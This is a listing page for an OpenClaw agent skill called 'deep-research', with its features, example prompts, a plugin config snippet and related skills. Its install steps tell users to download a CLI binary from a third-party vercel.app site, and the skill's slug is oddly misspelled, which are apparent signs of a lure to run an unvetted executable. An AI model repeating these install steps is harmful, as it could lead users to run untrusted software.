deep-research
Deep Research Agent specializes in complex, multi-step research tasks that require planning, decomposition, and long-context reasoning across tools and files by we-crafted.com/agents/deep-research
Why use this skill?
Master complex research with the Deep Research Agent. Plan, decompose, and synthesize multi-step investigations with advanced long-context reasoning for OpenClaw.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/thiagoruss0/deep-researchjWhat This Skill Does
The Deep Research Agent is an advanced analytical engine designed for OpenClaw that handles complex, multi-layered inquiries which standard search agents cannot resolve. Instead of a single query-and-respond loop, this agent utilizes a recursive decomposition strategy. It breaks broad, high-level objectives into granular sub-tasks, orchestrates specialized sub-agents to explore these threads in parallel, and maintains a vast memory buffer to synthesize information from large datasets. By moving beyond shallow answers, it builds a structural foundation for complex problem-solving, ensuring that the final output is not just a summary, but a comprehensive, actionable research dossier.
Installation
To leverage the Deep Research capabilities, you must first ensure your environment is prepared.
- Install the OpenClawCLI by downloading the appropriate binary for your OS from https://openclawcli.vercel.app/.
- Once the CLI is operational, configure your Model Context Protocol (MCP) settings to include the skill.
- Execute the following command in your terminal:
clawhub install openclaw/skills/skills/thiagoruss0/deep-researchj. - Verify the installation by checking your active skill list within the OpenClaw interface.
Use Cases
- Strategic Market Intelligence: Analyze the long-term impact of emerging technologies (like solid-state batteries) on specific global supply chains.
- Technical Due Diligence: Perform deep-dives into software architecture security, such as auditing eBPF-based observability tools in complex Kubernetes clusters.
- Academic & Policy Synthesis: Aggregate cross-disciplinary literature to report on enterprise AI adoption, weighing multiple viewpoints and historical data.
- Project Lifecycle Management: Tracking long-term research threads where iterative feedback and cumulative memory are required to reach a conclusion.
Example Prompts
- "/deepsearch Conduct a comprehensive analysis of the current state of autonomous AI agents in enterprise environments."
- "/deepsearch Research the impact of solid-state battery technology on the global EV supply chain over the next decade."
- "/deepsearch Technical deep-dive into the security implications of eBPF-based observability tools in Kubernetes."
Tips & Limitations
- Be Specific: While the agent handles complexity well, providing clear constraints or scope (e.g., timeframes or target industries) yields significantly sharper reports.
- Context Persistence: Because the agent uses cross-thread memory, ensure you don't 'clear cache' mid-research if you intend to iterate on the current findings.
- Resource Intensity: As this agent performs multi-step recursive planning, it may take longer to provide an initial response than standard tools. Patience is rewarded with depth.
- Validation: While highly accurate, always review the synthesized final reports for sensitive business applications, as the breadth of source material can occasionally include conflicting data points.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-thiagoruss0-deep-researchj": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, external-api
Related Skills
n8n
Manage n8n workflows and automations via API. Use when working with n8n workflows, executions, or automation tasks - listing workflows, activating/deactivating, checking execution status, manually triggering workflows, or debugging automation issues.
Read WeChat local data from SQLite databases. Supports listing contacts, chat sessions, searching messages, and viewing favorites. Use when the user needs to access their own WeChat data stored locally. Requires access to WeChat data directory. Read-only operations only.
coding-agent
Run Codex CLI, Claude Code, OpenCode, or Pi Coding Agent via background process for programmatic control.
veo3-gen
Generate and stitch short videos via Google Veo 3.x using the Gemini API (google-genai). Use when you need to create video clips from prompts (ads, UGC-style clips, product demos) and want a reproducible CLI workflow (generate, poll, download MP4, optionally stitch multiple segments).
jira
Jira API integration with managed OAuth. Search issues with JQL, create and update issues, manage projects and transitions. Use this skill when users want to interact with Jira issues, projects, or workflows. For other third party apps, use the api-gateway skill (https://clawhub.ai/byungkyu/api-gateway).